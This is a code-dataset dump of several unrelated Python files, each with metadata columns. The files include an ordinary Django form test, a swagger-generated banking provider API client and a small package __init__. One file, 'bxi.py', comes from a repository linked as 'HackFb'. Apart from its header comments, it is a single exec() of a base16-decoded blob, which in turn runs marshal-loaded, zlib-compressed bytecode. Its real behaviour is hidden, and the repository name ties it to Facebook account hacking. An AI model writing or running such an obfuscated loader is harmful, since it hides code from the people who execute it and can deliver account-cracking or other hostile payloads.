| 46 | 91 | 0.891304 | 7 | 92 | 11.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.472527 | 0.01087 | 92 | 1 | 92 | 92 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0.869565 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
e39c9f2b7648b1a2b91328230bd26b9e32fba70b | 11,790 | py | Python | bxi.py | Andika-Bandhelk/bxi.py | cb7ae1717c42545fadc9362bb2f311fcc1535715 | [
"Apache-2.0"
] | null | null | null | bxi.py | Andika-Bandhelk/bxi.py | cb7ae1717c42545fadc9362bb2f311fcc1535715 | [
"Apache-2.0"
] | null | null | null | bxi.py | Andika-Bandhelk/bxi.py | cb7ae1717c42545fadc9362bb2f311fcc1535715 | [
"Apache-2.0"
] | null | null | null | # Auther : Andika
# GitHub : https://github.com/Andika-Bandhelk/HackFb.git
# YouTube Channel : Belum ada gays
import base64
exec(base64.b16decode('2320436F6D70696C6564204279203A2042696E79616D696E0A2320476974487562203A2068747470733A2F2F6769746875622E636F6D2F42696E79616D696E2D62696E6E690A2320596F7554756265204368616E6E656C203A20547269636B2050726F6F660A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732827635C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830335C7830305C7830305C783030405C7830305C7830305C78303073215C7830305C7830305C783030645C7830305C783030645C7830315C7830306C5C7830305C7830305A5C7830305C783030655C7830305C7830306A5C7830315C783030645C7830325C7830305C7838335C7830315C783030645C7830315C7830305C78303455645C7830315C78303053285C7830335C7830305C7830305C783030695C7866665C7866665C7866665C7866664E73415C7830375C7830305C783030785C7839635C786264577B6F5C786462385C7831325C7866665C7864625C7866615C7831342C5C783137585C7863395C783137595C7862365C7831635C7862377152685C783137695C7839615C7862365C7862396D5C7865625C5C5C7839335C786132585C7861345C783831565C7830665C7864615C786536455C7831327524555C786462595C786563775C786266215C7866355C786230645C275C7863645C786465615C7862315C7830346C495C7866335C786536705C78653647525C7866325C7863645C7838395C783831605C78643034675C5C22266C5C7862315C7831315C7862365C786134295C7862315C786533405C7831325C7866645C7863325C7838332C665C7861395C7862645C7830635C786334325C7861315C7861315C7863645C7838392D5C7839375C7839635C783034315C7863645C7831365C7866365C7862665C7830355C7863625C7865635C7838325C275C7838615C7831313176475C7838397A5B5C7831305C7839395C783037425C786438295C7838395C78393641465C7865665C7863315C7830365C7866394F415C7838345C783134765C7862385C7861365C7839395C786636385C7865372C45695C783931485C783961735C7831365C783131215C7863305C7839635C783933335C7839365C7864345C7862315C5C6B5C275C783937405C7864395C7863615C786437665C7831635C7862325C783865482E295C786362442D7E5C7863365C7862325C783863445C783861745C786365395C7865332D5C783166755C7831305C7862355C7865342B5C786365565C783832705C7861335C7862345C7838312E34552B5C7839355C786239605C7863325C78383124485C7839325A664E5C786633315C7861325C7839395C783930415C783932345C7863655C7863645C786665775C7863355C7831615C7837664F5C7863385C7861394C54222A5C7863645C783865485C7830385C7863392D775F69235C7839372C5C783162235C7865375C7864335C7866395C7865395C7865625C7830665C7865374E5C7831615C7838335C7839365C786331495C7863325C7838325C7864385C7830325C7861315C7862655C7830315C7837665C7838652032265C7866335C7830305C786632495C7862325C7838385C7861395C7862355C7862315C786363425C7863655C786137205C783162725C7865346D5C786133725C7861615C7865395B5C7838615C7861315C7864347C5C7861305C7863375C745C786631395C7830625C7839395C7831345C7864365C783962205C7831315C7861346F6C5C7830335C78633051425C7830325C7838655C7866625C7863365C7830666A5C7861305C7866375C7862335C786237335C7861345F5C7838645C7838342D5C783938675C7839615C786136315C786164465C78313820345C7251355C786532297C5C7863315C786366505C7837666A5C7839385C7838615C7866375C7865625C786434565C7865665C7866365C7866345C7831325C7865645C7862304B5C7864326F4A285C7839655C783961685C7863625C7866365C7864355C7831384C2F355C725C783063685C7862392D7B5C7861305C786337345C7862342B5C786166755C7830345C7831645C7865335C7864616C5C7865395C7861325C7838615C7861305C7863335C7830655C7831345C7861335C7866325A5C783861565C78656372285C7864375C78623557655C786130625C7831625C7838335C786666795C7831385C7830363A2D5C7865345C783932705C786230735C7838325E5C7864316C5C7831335C7861345C786161235C786465525C7866395C7861655C783038357129652E4E5C7838365C7863335C7830355C7839355C7863622274225C7839365C7830655C7863334A6E5C7830302F5C783139355C7864305C7861665C7861635C7862382E425C7861325C7861345C786166395C7838645C7865
655C78643025676C6E5C786130575C7862302422675C78623265452A7E5C7861655C7864384E58715C7839355C7863395C7866662B765C7866345C786334505C786235605C783963315C7863655C7861315C7831313F435C78386465414A5C7861305C786636705C7831643E5C7861655C7839395C7839375C7838305C7830652B5C786336635C7863645C5C536C402D5C7862315C7831635C7862654C5C7863395C783062625C7831615C786162254D5C7830385C7862324A624D5C7865645C7839375C7865645C783939735C783961495C7861346A4F5C7837665C7831365B3F3C585C786639345C7863625C7830626961743D5C7839625C786264475C7839665C7861665C7863653F7D3C5C786664707E5C783832705C78643956745C7838655C7861635C7861645C7838325C78383776625C7861643C5C7866345C7866326D787B362F4F5C7861665C7861655C7862655C7863633E5C7862646E6C5C786436765C7862374A5C7838645C7864647A5C7839615C7839355C7864647A5C783934335C7863305C7865383D5B2C485C7830635C7838305C783830445C783131295C7830385C7839635C783137495C786232415C7838315C7830305C78646541335C7862315C7838655C7865613E525C7864345C7861334E5C7865305C5C5C7866355C7861665C7864395C7862305C7830387C3D5C7865635C7866645C783062675C7864395C783032352B5C7866315C783063775C7861345A5C7830305C7862345C7838655C7831375C7830335C7839365C7839335C7865635C7861395C7839325C7831615C783865475C7865335C78643170345C7831656664355C7862385C7861335C7862305C27645C7838625C7830315C786430535C7863305C78313731605C7866335C783831243C2D5C7864365C783833395C7865335C786365525C7861365C7838395C7864395C7837665C786334635C783833385C7866625C7831335C7865385C7830365C7864665C786434582B5C7866385C786266375C786630475C783832565C7863335C7830303C5C7838365C7866355C7862615C786233605C7866357B5C7839325C7863325C7831622C5C7863665C7838645C7865395C7861383E5C7862314D5C7863375C7861395C7831655C783065326F5C7838645C7831655C783938464C555C7838325C7831365C7830345C7838355C7839655C7839655C7861395C7838355C7862665C7866325C7839625C7838335B55295C7831305C7831335C7862615C7863385C7831303E607D5C7866625C786135467C5C7831395C786233423A5C7866335C7861345C7831304B5C7861625C7866665C7862325B5C7831395C786461795C7831345A5C7866645C7864642D5C7861645C745C7862335C7830635C7861665C7831365C7864385C7861662B5C7863644F5C7839345C7864665C7865665C7831385C7864315C7861615C7866355C783139425C7837665C7862303B22615C7839652A5C7865645C7831365C7838365C786439395C786438465C7862385C7839645C7839365C7839365C7839355C7866645C7839645C7861645E5C78663372675C7862367E215C7831625C7862642F5C7864625C783137335C7866646C5C786635515C7863625C7830634F5C7864315C7838305C7863665C783931765C7866365C786137565C7861362C224B415C7863385C7831655C7831315C7864665C786238555C7862615C7864315C7831375C7863305F745C7839655C783036345C7831397E2C5C7864325C783130205C7831625C7865615C786131695C7839387D7B5C786638665C786463513D5C7864353D5C7838645C78616521255C7864395C7862655C7866345C7866335C7864313F5C7866305C786130455C7864365C7861395C7866365C786133255C7861335C7831315C786231765C7861615C7861385C7863622B5C7839335C783130465C7863622E3C7D5C7863645C783030793C5C7865665C275C7864345C7830323B2D5C786534615C7862635C786462405C7831305C7865625C7862335B5C7866345C7830364A5D5C7864355C5C545C786132555C7862325C7864395C725C7863375C7861615B706B6A5C7838635C7831665C5C5C7838333F5C7839355C786532795C783130796D3C5C783835544A5C786432495C7831337A47385C786539205C7865625C7831636A5C7864635C786562565C7864336A5C7838375C7865645C786163385C7839355C7863345C7830325C7865623B5C78663428615C7861325C7839645C7863625C7865365C7866345C78393833212D5C7862335C78643967795C7839302F5C783164505C27215C7839636035205C78613464385C7865375C783934405C7866625C7866665C7839635C783132285C7864325C786438532A3F5C783136345C7831365C7839653B5C783832315C7831653D3F5C7831655C7862395C7831335C786637685C786632635C7861305C7865335C786637555C786535675
C783965795C7864305C745C7865337B605C7862345A5C7861645C7839635C725C7838345C745C7866625C7862385C7866365C7861395C786365675C783139495C7838365C7839665C7863662E5C786365465C7865655C7866625C7863645C7863355C786563395C7830335C786138725C7866665C7863355E5C7862635C7861315C7839335C7830665C7861625C783837515C7865375C7866315C7831656A2D5C7839615C7864625A345C7862645C7862305C7861655C7864355C7863355C7864656D5C7839355C7862395C7831615C7861655C783134725C783030685C7861395C7863655C7865655C78663564582E5C7838305C7861395C7861375C7865385C7863385C786235346D64725C7838385C7861375C7864377B2A5C7839325C786465775A5C786239575C7862395C786539755C7838615C786135463E735C7831625C783964465C7863305C7864395C7864625C7838625C7838665C7865385C7863625C7863355C7866353B5C7866345C7865365C7866345C7865635C7866635C7864356C5C7866365C7838625C7861325C7839625C7861385C7864315C7838305C275C7865645C7865655C7864385C786136525C786263783D5C7864343D5C78306347225C783164715C78626552425C7864355C725C7863355C7861395C7839655C786135685C7862335C783137565C7861325C7831615C7862635C786531295C7865385C783032365C786436205C7861375C7866655C7831645C786439785C7864335C786539385C7839384E5C783865475C7838372F5C78646338385C7839655C7831655C7838645C7863365C7865315C7866635C786638285C7831385C7838645C786464385C7838655C786463495C783163715C7831325C7839334C525C7864385C7838377D5C7862395C7863395C783839575C7831665C7830635C7838385C6E5C7830332A5C7838345C7863365C783037265C7865307D5C783161485C7865665C783966575C7862335C7838665C7830625C7839325C7831315C783065772D3F5C725C786132255C7863645C7838384F635C7863666D5C783838425C7864645C7838635C783138345C7862665C7862655C5C415C786635252C5C6E5C7831325C7865325C7839315C7863635C7866667C555C786435665C7830305C7830374A475C7861665E5C7865645C6E5C7862635C7863303C5C7830664C4E645C786331335F5C7838385C7863345C786537445C7862305C783832435C7861397A5C7861336F5C7839655C7865625C7838635E5C7838635C7865375C7864335C7838385C7831635C7863665C783866265C7861315C7830625C7861665C7839335C7863385C7831645C783166465C7864315C7866387072785C7831344C5C7838325C7863335C7862315C745C7831335C7838372B605C7830305C7863395C7866615C78316457735C7863375C275C7866385C7861395C786439635C7831625C786566265C7830305C7862345C7865615C7862385C7838305C7861625C7862335C7838304F686C5C786533325C745C7863305669505C7839645C786664402A5C7838305C7865625C7838325C786436635C7866395C7861385C78643865525C786530435C7861375C7830355C78303865665C7838305C7862305C7863645C72505C783962304E203B367E283B5C786130325C7830325C7863396F5C7863615C786230335C7863325C783766405C7831365C7864365E755C786635755C7865307C605C786531347E5C7861655C6E5C7862625C786237765C7838615C5C5C7864645C7839312D285C7830665C7866355C783164786B67495C786436315D5C7830305C7863365C7865385C786261515C7865395C7861625C7838357E37415C7863633C5C745C786665505C7830635C786238305C7861625C7839336F5C7838645C7830345C7839305C7864642E5C786663705C783835525C7838345C783766235C7864635C7863395C783937395C7830365C725C786565355C7865305C783035256B5C7838315C7830313B5C783066785C7839305C6E4F3951365C7865663D755C783137775C7864345C78616450585C7864635C783931642D5C7831355C783139405C7863306C235C7839345C7861395C7830305C7866665E355C7839665C7865612C5C7862315C786266575C7861665C7866345C7865344A665C7838355C7861635C786637375C7862386D5C7830325C7864665C786236246A5C7838632D5C74555C275C7839625F5C7862335C7861666B375C786263715F5C7831655C7838665C7864335C7865365C7866635C7838325C7861655C7862365C7861375C5C545C7866335C783866525C786233565C7839365C7838645C7839395C7862665C783138364B5C7861335C7837665C7830625C7866615C7864665C786466745C7862337D5C7862623F5C786135475C7838305C786232575C783165744B6958355C786163265C7864615C7830655C7830625C7865625C783935
5C7862625C786331445C7863315C7861375C7839665C7838615C7830355C7862655C7861645C7863355C7864625C7861395C7838375C7865645C7839345C7831355C7866305C783036355C7838625C7830325C7831342D5C745C783963785C783939623D6B325C7862315C7839335C7865325C7864365C7866395C786139235C7862325D5C7838665C7863655C786265515C7839325C7864615C7864315C7862365C78646323535C786637375C7838325C7865336C735C7831665C7861325C7830325C7861645C786634715C7866645C7861665C7838625C78613067405C7838367C5F5C7839645C7866647D5C78316636385C7831665C7831305C7830334E487E5C7862355C786366555C7838375C7839375C7866665C7830325C7862665C7838397A42285C7830325C7830305C7830305C783030745C7830345C7830305C7830305C7830307A6C6962745C6E5C7830305C7830305C7830306465636F6D7072657373285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030735C7830345C7830305C7830305C7830305C7831625B306D745C7830385C7830305C7830305C7830303C6D6F64756C653E5C7830345C7830305C7830305C783030735C7830325C7830305C7830305C7830305C7830635C783031272929')) | 2,358 | 11,666 | 0.996777 | 21 | 11,790 | 559.619048 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.854498 | 0.001442 | 11,790 | 5 | 11,666 | 2,358 | 0.143719 | 0.008736 | 0 | 0 | 0 | 0 | 0.996234 | 0.996234 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 12 |
5837a2e73b86c57e8aa4899f6898c31e59228950 | 6,926 | py | Python | tests/test_forms.py | moshthepitt/django-approvals | ebf3fd42e88ac255191d0764387fc213a2472ee4 | [
"MIT"
] | 4 | 2020-05-30T16:15:22.000Z | 2021-06-15T20:45:01.000Z | tests/test_forms.py | moshthepitt/django-model-reviews | ebf3fd42e88ac255191d0764387fc213a2472ee4 | [
"MIT"
] | 8 | 2020-05-20T19:00:13.000Z | 2020-10-04T09:04:05.000Z | tests/test_forms.py | moshthepitt/django-model-reviews | ebf3fd42e88ac255191d0764387fc213a2472ee4 | [
"MIT"
] | null | null | null | """Test forms."""
from datetime import datetime
from unittest.mock import patch

from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.test import RequestFactory, TestCase

import pytz
from model_mommy import mommy

from model_reviews.forms import PerformReview
from model_reviews.models import ModelReview


class TestForms(TestCase):
    """Test class for forms."""

    def setUp(self):
        """Set up test class."""
        self.factory = RequestFactory()

    @patch("django.utils.timezone.now")
    def test_successful_performreview(self, mock):
        """Test successful PerformReview submission."""
        mocked_now = datetime(2010, 1, 1, tzinfo=pytz.timezone(settings.TIME_ZONE))
        mock.return_value = mocked_now

        user1 = mommy.make("auth.User", username="joe")
        user2 = mommy.make("auth.User", username="jane")
        test_model = mommy.make("test_app.TestModel", name="Test")
        obj_type = ContentType.objects.get_for_model(test_model)
        review = ModelReview.objects.get(content_type=obj_type, object_id=test_model.id)
        review.user = user1
        review.save()
        reviewer = mommy.make("model_reviews.Reviewer", user=user2, review=review)

        request = self.factory.get("/")
        request.session = {}
        request.user = user2

        data = {
            "review": review.pk,
            "reviewer": reviewer.pk,
            "review_status": ModelReview.APPROVED,
        }

        form = PerformReview(data=data)
        self.assertTrue(form.is_valid())
        form.save()

        review.refresh_from_db()
        reviewer.refresh_from_db()
        test_model.refresh_from_db()

        self.assertEqual(ModelReview.APPROVED, review.review_status)
        self.assertEqual(ModelReview.APPROVED, test_model.review_status)
        self.assertEqual(mocked_now, review.review_date)
        self.assertEqual(mocked_now, test_model.review_date)
        self.assertEqual(True, reviewer.reviewed)
        self.assertEqual(mocked_now, reviewer.review_date)
        self.assertEqual(ModelReview.APPROVED, reviewer.review_status)
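
    @staticmethod
    def _frozen_now():
        """Illustrative helper (not in the original suite): the value the
        tests in this class freeze ``django.utils.timezone.now`` to via
        ``unittest.mock.patch``, so that review_date assertions are
        deterministic."""
        return datetime(2010, 1, 1, tzinfo=pytz.timezone(settings.TIME_ZONE))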

    @patch("django.utils.timezone.now")
    def test_successful_performreview_multiple_reviewers(self, mock):
        """Test successful PerformReview submission with multiple reviewers."""
        mocked_now = datetime(2010, 1, 1, tzinfo=pytz.timezone(settings.TIME_ZONE))
        mock.return_value = mocked_now

        user1 = mommy.make("auth.User", username="joe")
        user2 = mommy.make("auth.User", username="jane")
        user3 = mommy.make("auth.User", username="jenny")
        test_model = mommy.make("test_app.TestModel", name="Test")
        obj_type = ContentType.objects.get_for_model(test_model)
        review = ModelReview.objects.get(content_type=obj_type, object_id=test_model.id)
        review.user = user1
        review.save()
        mommy.make("model_reviews.Reviewer", user=user2, review=review)
        reviewer = mommy.make("model_reviews.Reviewer", user=user3, review=review)

        request = self.factory.get("/")
        request.session = {}
        request.user = user3

        data = {
            "review": review.pk,
            "reviewer": reviewer.pk,
            "review_status": ModelReview.APPROVED,
        }

        form = PerformReview(data=data)
        self.assertTrue(form.is_valid())
        form.save()

        review.refresh_from_db()
        reviewer.refresh_from_db()
        test_model.refresh_from_db()

        self.assertEqual(ModelReview.APPROVED, review.review_status)
        self.assertEqual(ModelReview.APPROVED, test_model.review_status)
        self.assertEqual(mocked_now, review.review_date)
        self.assertEqual(mocked_now, test_model.review_date)
        self.assertEqual(True, reviewer.reviewed)
        self.assertEqual(mocked_now, reviewer.review_date)
        self.assertEqual(ModelReview.APPROVED, reviewer.review_status)

    # pylint: disable=too-many-locals
    @patch("tests.test_app.models.get_next_reviewers")
    @patch("django.utils.timezone.now")
    def test_successful_performreview_multiple_reviewers_levels(self, mock, next_mock):
        """Test successful PerformReview with multiple reviewers of different levels."""
        mocked_now = datetime(2010, 1, 1, tzinfo=pytz.timezone(settings.TIME_ZONE))
        mock.return_value = mocked_now

        user1 = mommy.make("auth.User", username="joe")
        user2 = mommy.make("auth.User", username="jane")
        user3 = mommy.make("auth.User", username="jenny")
        test_model = mommy.make("test_app.TestModel", name="Test")
        obj_type = ContentType.objects.get_for_model(test_model)
        review = ModelReview.objects.get(content_type=obj_type, object_id=test_model.id)
        review.user = user1
        review.save()
        reviewer = mommy.make(
            "model_reviews.Reviewer", user=user2, review=review, level=1
        )
        reviewer2 = mommy.make(
            "model_reviews.Reviewer", user=user3, review=review, level=2
        )

        request = self.factory.get("/")
        request.session = {}
        request.user = user2

        data = {
            "review": review.pk,
            "reviewer": reviewer.pk,
            "review_status": ModelReview.APPROVED,
        }

        form = PerformReview(data=data)
        self.assertTrue(form.is_valid())
        form.save()

        review.refresh_from_db()
        reviewer.refresh_from_db()
        test_model.refresh_from_db()

        next_mock.assert_called_once_with(review_obj=review)
        self.assertEqual(ModelReview.PENDING, review.review_status)
        self.assertEqual(ModelReview.PENDING, test_model.review_status)
        self.assertEqual(None, review.review_date)
        self.assertEqual(None, test_model.review_date)
        self.assertEqual(True, reviewer.reviewed)
        self.assertEqual(mocked_now, reviewer.review_date)
        self.assertEqual(ModelReview.APPROVED, reviewer.review_status)

        request = self.factory.get("/")
        request.session = {}
        request.user = user3

        data2 = {
            "review": review.pk,
            "reviewer": reviewer2.pk,
            "review_status": ModelReview.APPROVED,
        }

        form = PerformReview(data=data2)
        self.assertTrue(form.is_valid())
        form.save()

        review.refresh_from_db()
        reviewer2.refresh_from_db()
        test_model.refresh_from_db()

        self.assertEqual(ModelReview.APPROVED, review.review_status)
        self.assertEqual(ModelReview.APPROVED, test_model.review_status)
        self.assertEqual(mocked_now, review.review_date)
        self.assertEqual(mocked_now, test_model.review_date)
        self.assertEqual(True, reviewer2.reviewed)
        self.assertEqual(mocked_now, reviewer2.review_date)
        self.assertEqual(ModelReview.APPROVED, reviewer2.review_status)
| 35.336735 | 88 | 0.66633 | 785 | 6,926 | 5.690446 | 0.135032 | 0.094023 | 0.034923 | 0.067159 | 0.829416 | 0.815312 | 0.767405 | 0.765615 | 0.753526 | 0.697336 | 0 | 0.008934 | 0.224228 | 6,926 | 195 | 89 | 35.517949 | 0.822446 | 0.038695 | 0 | 0.711268 | 0 | 0 | 0.076354 | 0.033952 | 0 | 0 | 0 | 0 | 0.232394 | 1 | 0.028169 | false | 0 | 0.06338 | 0 | 0.098592 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5845f21b5a4589965f2606b32172d2d391b0c689 | 9,331 | py | Python | swagger_client/api/provider_api.py | chbndrhnns/ahoi-client | 8bd25f541c05af17c82904fa250272514b7971f2 | [
"MIT"
] | null | null | null | swagger_client/api/provider_api.py | chbndrhnns/ahoi-client | 8bd25f541c05af17c82904fa250272514b7971f2 | [
"MIT"
] | null | null | null | swagger_client/api/provider_api.py | chbndrhnns/ahoi-client | 8bd25f541c05af17c82904fa250272514b7971f2 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
[AHOI cookbook](/ahoi/docs/cookbook/index.html) [Data Privacy](/sandboxmanager/#/privacy) [Terms of Service](/sandboxmanager/#/terms) [Imprint](https://sparkassen-hub.com/impressum/) © 2016‐2017 Starfinanz - Ein Unternehmen der Finanz Informatik # noqa: E501
OpenAPI spec version: 2.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class ProviderApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_provider(self, provider_id, **kwargs): # noqa: E501
"""Get provider # noqa: E501
Retrieve a single provider identified by **providerId**. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_provider(provider_id, async=True)
>>> result = thread.get()
:param async bool
:param int provider_id: The **providerId** to retrieve (required)
:return: Provider
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_provider_with_http_info(provider_id, **kwargs) # noqa: E501
else:
(data) = self.get_provider_with_http_info(provider_id, **kwargs) # noqa: E501
return data
def get_provider_with_http_info(self, provider_id, **kwargs): # noqa: E501
"""Get provider # noqa: E501
Retrieve a single provider identified by **providerId**. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_provider_with_http_info(provider_id, async=True)
>>> result = thread.get()
:param async bool
:param int provider_id: The **providerId** to retrieve (required)
:return: Provider
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['provider_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_provider" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'provider_id' is set
if ('provider_id' not in params or
params['provider_id'] is None):
raise ValueError("Missing the required parameter `provider_id` when calling `get_provider`") # noqa: E501
collection_formats = {}
path_params = {}
if 'provider_id' in params:
path_params['providerId'] = params['provider_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/providers/{providerId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Provider', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_providers(self, **kwargs): # noqa: E501
"""List bank providers # noqa: E501
Retrieve a list of bank providers. A provider-**id** is necessary to create an _access_. To retrieve the necessary access fields, you need to query the specific `provider/{providerId}`. For performance reasons they are kept separate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_providers(async=True)
>>> result = thread.get()
:param async bool
:param str bank_code: Optional — if length = 8, the response will also contain data describing the fields required for account setup
:param bool supported: Optional — response should only contain providers supported for account setup via this API
:param str query: Optional — search parameters for BankCode, BIC, Location, Name. Will be ignored if the bankCode query parameter is set.
:return: list[Provider]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_providers_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_providers_with_http_info(**kwargs) # noqa: E501
return data
def get_providers_with_http_info(self, **kwargs): # noqa: E501
"""List bank providers # noqa: E501
Retrieve a list of bank providers. A provider-**id** is necessary to create an _access_. To retrieve the necessary access fields, you need to query the specific `provider/{providerId}`. For performance reasons they are kept separate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_providers_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str bank_code: Optional — if length = 8, the response will also contain data describing the fields required for account setup
:param bool supported: Optional — response should only contain providers supported for account setup via this API
:param str query: Optional — search parameters for BankCode, BIC, Location, Name. Will be ignored if the bankCode query parameter is set.
:return: list[Provider]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bank_code', 'supported', 'query'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_providers" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'bank_code' in params:
query_params.append(('bankCode', params['bank_code'])) # noqa: E501
if 'supported' in params:
query_params.append(('supported', params['supported'])) # noqa: E501
if 'query' in params:
query_params.append(('query', params['query'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/providers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Provider]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
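
# Illustrative usage sketch (not part of the generated client). It assumes an
# ApiClient already configured for the "oauth2" auth setting declared above,
# and that the returned Provider models expose an `id` attribute per the
# swagger schema -- both assumptions, not guarantees.
if __name__ == "__main__":
    api = ProviderApi()
    # Free-text provider search, limited to providers supported for account
    # setup via this API.
    providers = api.get_providers(query="Sparkasse", supported=True)
    if providers:
        # Fetch the single provider, including the fields needed for setup.
        print(api.get_provider(providers[0].id))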
| 40.746725 | 277 | 0.620298 | 1,091 | 9,331 | 5.12099 | 0.187901 | 0.042957 | 0.020047 | 0.025774 | 0.82155 | 0.781815 | 0.781815 | 0.746733 | 0.746733 | 0.732951 | 0 | 0.016745 | 0.289572 | 9,331 | 228 | 278 | 40.925439 | 0.825162 | 0.04694 | 0 | 0.666667 | 0 | 0 | 0.162185 | 0.032065 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.035088 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
586baca1222aea22911b6969182be508daf1088d | 182 | py | Python | ithopy/__init__.py | philipkocanda/ithopy | 96b3ee8f7a272e8b8d0b67f8fb5ca888814b0203 | [
"MIT"
] | 1 | 2021-10-04T08:35:52.000Z | 2021-10-04T08:35:52.000Z | ithopy/__init__.py | philipkocanda/ithopy | 96b3ee8f7a272e8b8d0b67f8fb5ca888814b0203 | [
"MIT"
] | null | null | null | ithopy/__init__.py | philipkocanda/ithopy | 96b3ee8f7a272e8b8d0b67f8fb5ca888814b0203 | [
"MIT"
] | null | null | null | from ithopy.message import Message
from ithopy.payload import Payload
from ithopy.devices.hru_device import HruDevice
from ithopy.devices.hru_message_builder import HruMessageBuilder | 45.5 | 64 | 0.884615 | 25 | 182 | 6.32 | 0.44 | 0.253165 | 0.21519 | 0.253165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082418 | 182 | 4 | 64 | 45.5 | 0.946108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
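
# Convenience re-export list (an assumption about the intended public API,
# simply mirroring the imports above):
__all__ = ["Message", "Payload", "HruDevice", "HruMessageBuilder"]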
586e52a200ecdf981c4e8e72590608685ce08b5a | 234 | py | Python | src/GameGenerator.py | NowanIlfideme/MafiaEngine | cec0ea28172154d14a2db13f04c22b0b43834755 | [
"Apache-2.0"
